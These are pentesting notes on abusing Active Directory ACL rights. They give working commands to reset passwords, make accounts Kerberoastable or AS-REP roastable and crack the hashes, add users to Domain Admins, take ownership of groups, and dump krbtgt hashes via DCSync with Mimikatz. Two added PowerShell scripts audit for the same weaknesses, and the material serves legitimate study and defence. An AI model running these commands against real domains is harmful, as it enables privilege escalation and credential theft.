Pentesting and Red Teaming Notes

ACLs Abuse

Generic All on User

If we have GenericAll rights over a user object we can:

  1. Change that user's password:

net user <username> <password> /domain

  2. Set up targeted Kerberoasting by adding an SPN to the account (which makes it Kerberoastable), Kerberoasting it and cracking the hash offline.

  • First set an SPN on that user object

Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}

  • Then get the hash and crack it

Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt

  3. Set up targeted AS-REP roasting by disabling Kerberos pre-authentication on that user (4194304 is the DONT_REQ_PREAUTH bit of userAccountControl, toggled here with -XOR), AS-REP roasting it and cracking the hash offline.

Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
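Both "targeted roasting" steps above leave a durable trace in the directory: a user account that now carries an SPN, or one whose userAccountControl has the DONT_REQ_PREAUTH bit set. The script below is an added example (not part of the original notes, not PowerView) that audits for exactly those two conditions. It assumes the RSAT ActiveDirectory module and read access to the domain; the function name Get-RoastableUserAccount is the author's own.

```powershell
# Added example, not part of the original notes: audit the two preconditions the
# "targeted roasting" steps above create, so that an account someone made
# roastable shows up in a routine check. Assumes the RSAT ActiveDirectory module
# and read access to the domain.
Import-Module ActiveDirectory

function Get-RoastableUserAccount {
    [CmdletBinding()]
    param(
        # Search base; defaults to the whole domain
        [string]$SearchBase = (Get-ADDomain).DistinguishedName
    )

    # DONT_REQ_PREAUTH, the same userAccountControl bit the -XOR line above flips
    $DontReqPreauth = 0x400000   # 4194304
    # LDAP bitwise-AND matching rule, used to test a single UAC flag server-side
    $BitAnd = '1.2.840.113556.1.4.803'

    # 1. User accounts carrying an SPN: Kerberoastable by any authenticated user.
    #    krbtgt always has one and is excluded.
    Get-ADUser -SearchBase $SearchBase `
        -LDAPFilter '(&(objectCategory=person)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))' `
        -Properties servicePrincipalName, whenChanged |
        ForEach-Object {
            [pscustomobject]@{
                Account     = $_.SamAccountName
                Finding     = 'SPN on user account (Kerberoastable)'
                Detail      = ($_.servicePrincipalName -join '; ')
                WhenChanged = $_.whenChanged
            }
        }

    # 2. User accounts with pre-authentication disabled: AS-REP roastable
    #    without any credentials at all.
    Get-ADUser -SearchBase $SearchBase `
        -LDAPFilter "(&(objectCategory=person)(userAccountControl:${BitAnd}:=$DontReqPreauth))" `
        -Properties userAccountControl, whenChanged |
        ForEach-Object {
            [pscustomobject]@{
                Account     = $_.SamAccountName
                Finding     = 'DONT_REQ_PREAUTH set (AS-REP roastable)'
                Detail      = ('userAccountControl=0x{0:X}' -f $_.userAccountControl)
                WhenChanged = $_.whenChanged
            }
        }
}

# Most recently changed first: a fresh change on an account that never needed an
# SPN or a pre-auth exemption is the one to investigate.
Get-RoastableUserAccount | Sort-Object WhenChanged -Descending | Format-Table -AutoSize
```

Service accounts legitimately carry SPNs, so the useful signal is the combination of a recent whenChanged on an account outside the known service-account set; pairing this with the directory-change audit events on the same attributes (servicePrincipalName, userAccountControl) turns it from a periodic sweep into a detection.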

Generic All on Group

If we have GenericAll rights on a group, for example Domain Admins, we can:

  1. Add ourselves to that group

net group "Domain Admins" myuser /add /domain

Generic write / Write on computer

If we have GenericWrite or WriteProperty on a domain computer object we can configure Resource-Based Constrained Delegation on it and gain access to that computer. See the Resource-Based-Constrained-Delegation.md section.

WriteProperty on Group

If our controlled user has the WriteProperty right on all objects of the Domain Admins group, we can again add ourselves to Domain Admins and escalate privileges:

Add-NetGroupUser -UserName myuser -GroupName "Domain Admins" -Domain "offense.local"

Self-Membership on group

If our user has the Self-Membership right on a group we can add ourselves to that group:

Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"

WriteProperty on group

If our user has the WriteProperty right on a group we can add ourselves to that group:

net group "domain admins" spotless /add /domain

ForceChangePassword on user

If we have the ExtendedRight User-Force-Change-Password on a user object, we can reset that user's password without knowing the current one:

  • Using PowerView (without -AccountPassword it prompts for the new password)

Set-DomainUserPassword -Identity targetuser -Verbose

  • Another method: pass the new password from a credential object

$c = Get-Credential
Set-DomainUserPassword -Identity targetuser -AccountPassword $c.Password -Verbose

WriteOwner on Group

If a user under our control has WriteOwner on a group we can change the group's owner to our user. In the example below the SID is that of the Domain Admins group (RID 512):

Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "ouruser" -Verbose

GenericWrite on Group

This allows us to add users (ourselves, for example) as members of the group:

# Create creds
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
# Add user to group
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
# Check user was added
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
# Remove group member
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose

DCsync

If we have DCSync rights (the replication extended rights on the domain object) we can use Mimikatz to dump the hashes of all user and computer objects:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
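Every abuse on this page, from GenericAll on a user through WriteProperty, Self-Membership and WriteOwner on a group, ForceChangePassword, and the replication rights behind DCSync, is a single ACE in an object's DACL, so the defensive counterpart is to enumerate those ACEs and flag the trustees that should not hold them. The script below is an added example (not part of the original notes, not PowerView). It assumes the RSAT ActiveDirectory module (for the AD: drive, Get-ADDomain and Get-ADGroup) and read access to the DACLs; the list of expected trustees is an assumption to adapt per environment, and the function name Get-DangerousAce is the author's own. The GUIDs are the well-known schema values for the member attribute, User-Force-Change-Password, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.

```powershell
# Added example, not part of the original notes or of PowerView: list the ACEs on an
# AD object that grant the rights abused on this page to a trustee other than the
# expected administrative principals. Assumes the RSAT ActiveDirectory module
# (AD: drive, Get-ADDomain, Get-ADGroup) and read access to the object's DACL.
Import-Module ActiveDirectory

# Well-known schema/rights GUIDs that appear in the ObjectType of the ACEs
$Guid = @{
    All                 = '00000000-0000-0000-0000-000000000000'  # ACE applies to all attributes/rights
    Member              = 'bf9679c0-0de6-11d0-a285-00aa003049e2'  # 'member' attribute of a group
    ForceChangePassword = '00299570-246d-11d0-a768-00aa006e0529'  # User-Force-Change-Password
    ReplGetChanges      = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'  # DS-Replication-Get-Changes
    ReplGetChangesAll   = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'  # DS-Replication-Get-Changes-All
}

# Principals expected to hold broad rights (assumption; adjust per environment).
$NetBios = (Get-ADDomain).NetBIOSName
$ExpectedTrustee = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS', 'BUILTIN\Administrators',
    "$NetBios\Domain Admins", "$NetBios\Enterprise Admins", "$NetBios\Domain Controllers"
)

function Get-DangerousAce {
    [CmdletBinding()]
    param(
        # Distinguished name of the user, group, computer or domain object to inspect
        [Parameter(Mandatory)][string]$DistinguishedName
    )

    $R   = [System.DirectoryServices.ActiveDirectoryRights]
    $acl = Get-Acl -Path "AD:\$DistinguishedName"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ExpectedTrustee -contains $ace.IdentityReference.Value) { continue }

        $rights   = $ace.ActiveDirectoryRights
        $obj      = $ace.ObjectType.ToString()       # attribute or right the ACE is scoped to
        $onMember = ($obj -eq $Guid.All) -or ($obj -eq $Guid.Member)
        $findings = @()

        if ($rights.HasFlag($R::GenericAll)) {
            $findings += 'GenericAll'                  # implies everything checked below
        } else {
            if ($rights.HasFlag($R::GenericWrite)) { $findings += 'GenericWrite' }
            elseif ($rights.HasFlag($R::WriteProperty) -and $onMember) { $findings += 'WriteProperty(member)' }
            if ($rights.HasFlag($R::Self) -and $onMember) { $findings += 'Self-Membership' }
            if ($rights.HasFlag($R::WriteOwner))          { $findings += 'WriteOwner' }
            if ($rights.HasFlag($R::WriteDacl))           { $findings += 'WriteDacl' }
            if ($rights.HasFlag($R::ExtendedRight)) {
                if     ($obj -eq $Guid.All)                 { $findings += 'AllExtendedRights' }
                elseif ($obj -eq $Guid.ForceChangePassword) { $findings += 'ForceChangePassword' }
                elseif ($obj -eq $Guid.ReplGetChanges)      { $findings += 'DS-Replication-Get-Changes' }
                elseif ($obj -eq $Guid.ReplGetChangesAll)   { $findings += 'DS-Replication-Get-Changes-All' }
            }
        }

        if ($findings.Count -gt 0) {
            [pscustomobject]@{
                Object    = $DistinguishedName
                Trustee   = $ace.IdentityReference.Value
                Rights    = ($findings -join ', ')
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Usage: the objects the sections above target. DCSync needs the replication
# rights on the domain object itself, so that DN is checked as well.
$domainDN = (Get-ADDomain).DistinguishedName
Get-DangerousAce -DistinguishedName (Get-ADGroup -Identity 'Domain Admins').DistinguishedName
Get-DangerousAce -DistinguishedName $domainDN | Format-Table -AutoSize
```

Run it against every protected group and the domain head on a schedule and diff the output: a new trustee appearing with any of these rights is the precondition for each attack above, and a principal that appears with both replication rights on the domain object can already DCSync. The Inherited column separates ACEs set directly on the object from ones flowing down from a parent OU, which is where the fix has to be applied.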